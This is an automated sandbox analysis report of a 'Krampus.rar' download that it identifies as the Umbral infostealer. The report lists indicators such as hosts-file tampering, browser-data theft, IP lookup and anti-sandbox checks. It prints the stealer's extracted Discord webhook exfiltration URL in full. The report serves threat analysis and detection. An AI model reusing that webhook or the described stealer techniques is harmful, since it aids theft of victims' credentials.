Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-12-2024 21:40
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://krampus.pages.dev/Krampus.rar
Resource
win10v2004-20241007-en
General
-
Target
https://krampus.pages.dev/Krampus.rar
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1225264880039235738/46bNxRt60w9YjuGcjqkvDLT2Saa0gXhoe7P2-CbuUHwdxfwONEkNG92CHxRK6S67a3Bd
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000300000000070f-553.dat family_umbral behavioral1/memory/4072-555-0x0000021A6C4E0000-0x0000021A6C520000-memory.dmp family_umbral -
Umbral family
-
pid Process 5300 powershell.exe 5764 powershell.exe 5384 powershell.exe 4964 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts b5uEJHZB6Rl.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 3 IoCs
pid Process 1600 7z2409-x64.exe 5928 7zG.exe 4072 b5uEJHZB6Rl.exe -
Loads dropped DLL 2 IoCs
pid Process 3500 Process not Found 5928 7zG.exe -
Modifies system executable filetype association 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" OneDrive.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 102 discord.com 103 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 94 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\it.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sv.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\tk.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\7z.dll 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ca.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\kab.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ps.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\tg.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ar.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\id.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\7-zip.dll 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\et.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ka.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\7z.exe 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\nn.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\es.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\tt.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\tr.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fy.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fur.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pt.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\7-zip32.dll 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\License.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mn.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sw.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\7zG.exe 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Uninstall.exe 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ext.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fi.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\gl.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sk.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\uk.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt 7z2409-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\uz-cyrl.txt 7z2409-x64.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7z2409-x64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OneDrive.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5964 PING.EXE 5836 cmd.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz OneDrive.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5688 wmic.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION OneDrive.exe Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" OneDrive.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\Programmable OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TypeLib OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\ = "ISyncEngineDeviceNotifications" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\FileSyncClient.AutoPlayHandler.1\CLSID OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib\Version = "1.0" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\ProgID OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}\ProxyStubClsid32 OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\TypeLib OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32 OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\odopen\shell OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\FileSyncClient.AutoPlayHandler.1\ = "FileSyncClient AutoPlayHandler Class" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\BannerNotificationHandler.BannerNotificationHandler.1\CLSID\ = "{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\ProxyStubClsid32 OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ = "ISyncEngineBandwidthLimiter" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\ProgID OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7} OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\ = "IGetLibrariesCallback" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17} OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A} OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\ = "FileSync ThumbnailProvider" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib\Version = "1.0" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib\Version = "1.0" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344} OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib\Version = "1.0" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\ProgID OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\ = "IFileSyncClient8" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\OOBERequestHandler.OOBERequestHandler OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\ = "OOBERequestHandler Class" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32 OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406} OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\ = "ICreateLibraryCallback" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\TypeLib\Version = "1.0" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\TypeLib\Version = "1.0" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib\Version = "1.0" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\TypeLib\Version = "1.0" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\TypeLib\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0\FLAGS\ = "0" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\LocalServer32 OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TypeLib\Version = "1.0" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\TypeLib OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\ProxyStubClsid32 OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib\Version = "1.0" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\ = "ILoginCallback" OneDrive.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17} OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\VersionIndependentProgID\ = "StorageProviderUriSource.StorageProviderUriSource" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\ = "IOneDriveInfoProvider" OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\ = "IGetLinkCallback" OneDrive.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 765348.crdownload:SmartScreen msedge.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5964 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5180 OneDrive.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid Process 4852 msedge.exe 4852 msedge.exe 3484 msedge.exe 3484 msedge.exe 3020 identity_helper.exe 3020 identity_helper.exe 1636 msedge.exe 1636 msedge.exe 3004 msedge.exe 3004 msedge.exe 4072 b5uEJHZB6Rl.exe 4072 b5uEJHZB6Rl.exe 4964 powershell.exe 4964 powershell.exe 4964 powershell.exe 5300 powershell.exe 5300 powershell.exe 5300 powershell.exe 5764 powershell.exe 5764 powershell.exe 5764 powershell.exe 5740 powershell.exe 5740 powershell.exe 5740 powershell.exe 5384 powershell.exe 5384 powershell.exe 5384 powershell.exe 6052 msedge.exe 6052 msedge.exe 6052 msedge.exe 6052 msedge.exe 5180 OneDrive.exe 5180 OneDrive.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1952 OpenWith.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
pid Process 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 5928 7zG.exe Token: 35 5928 7zG.exe Token: SeSecurityPrivilege 5928 7zG.exe Token: SeSecurityPrivilege 5928 7zG.exe Token: SeDebugPrivilege 4072 b5uEJHZB6Rl.exe Token: SeIncreaseQuotaPrivilege 1544 wmic.exe Token: SeSecurityPrivilege 1544 wmic.exe Token: SeTakeOwnershipPrivilege 1544 wmic.exe Token: SeLoadDriverPrivilege 1544 wmic.exe Token: SeSystemProfilePrivilege 1544 wmic.exe Token: SeSystemtimePrivilege 1544 wmic.exe Token: SeProfSingleProcessPrivilege 1544 wmic.exe Token: SeIncBasePriorityPrivilege 1544 wmic.exe Token: SeCreatePagefilePrivilege 1544 wmic.exe Token: SeBackupPrivilege 1544 wmic.exe Token: SeRestorePrivilege 1544 wmic.exe Token: SeShutdownPrivilege 1544 wmic.exe Token: SeDebugPrivilege 1544 wmic.exe Token: SeSystemEnvironmentPrivilege 1544 wmic.exe Token: SeRemoteShutdownPrivilege 1544 wmic.exe Token: SeUndockPrivilege 1544 wmic.exe Token: SeManageVolumePrivilege 1544 wmic.exe Token: 33 1544 wmic.exe Token: 34 1544 wmic.exe Token: 35 1544 wmic.exe Token: 36 1544 wmic.exe Token: SeIncreaseQuotaPrivilege 1544 wmic.exe Token: SeSecurityPrivilege 1544 wmic.exe Token: SeTakeOwnershipPrivilege 1544 wmic.exe Token: SeLoadDriverPrivilege 1544 wmic.exe Token: SeSystemProfilePrivilege 1544 wmic.exe Token: SeSystemtimePrivilege 1544 wmic.exe Token: SeProfSingleProcessPrivilege 1544 wmic.exe Token: SeIncBasePriorityPrivilege 1544 wmic.exe Token: SeCreatePagefilePrivilege 1544 wmic.exe Token: SeBackupPrivilege 1544 wmic.exe Token: SeRestorePrivilege 1544 wmic.exe Token: SeShutdownPrivilege 1544 wmic.exe Token: SeDebugPrivilege 1544 wmic.exe Token: SeSystemEnvironmentPrivilege 1544 wmic.exe Token: SeRemoteShutdownPrivilege 1544 wmic.exe Token: SeUndockPrivilege 1544 wmic.exe Token: SeManageVolumePrivilege 1544 wmic.exe Token: 33 1544 wmic.exe Token: 34 1544 wmic.exe Token: 35 1544 wmic.exe Token: 36 1544 wmic.exe Token: SeDebugPrivilege 4964 powershell.exe Token: SeDebugPrivilege 5300 powershell.exe Token: SeDebugPrivilege 5764 powershell.exe Token: SeDebugPrivilege 5740 powershell.exe Token: SeIncreaseQuotaPrivilege 2204 wmic.exe Token: SeSecurityPrivilege 2204 wmic.exe Token: SeTakeOwnershipPrivilege 2204 wmic.exe Token: SeLoadDriverPrivilege 2204 wmic.exe Token: SeSystemProfilePrivilege 2204 wmic.exe Token: SeSystemtimePrivilege 2204 wmic.exe Token: SeProfSingleProcessPrivilege 2204 wmic.exe Token: SeIncBasePriorityPrivilege 2204 wmic.exe Token: SeCreatePagefilePrivilege 2204 wmic.exe Token: SeBackupPrivilege 2204 wmic.exe Token: SeRestorePrivilege 2204 wmic.exe Token: SeShutdownPrivilege 2204 wmic.exe Token: SeDebugPrivilege 2204 wmic.exe -
Suspicious use of FindShellTrayWindow 46 IoCs
pid Process 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 5928 7zG.exe 5180 OneDrive.exe 5180 OneDrive.exe -
Suspicious use of SendNotifyMessage 26 IoCs
pid Process 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 4852 msedge.exe 5180 OneDrive.exe 5180 OneDrive.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1952 OpenWith.exe 1952 OpenWith.exe 1952 OpenWith.exe 1952 OpenWith.exe 1952 OpenWith.exe 1600 7z2409-x64.exe 5180 OneDrive.exe -
Suspicious use of WriteProcessMemory 64 IoCs
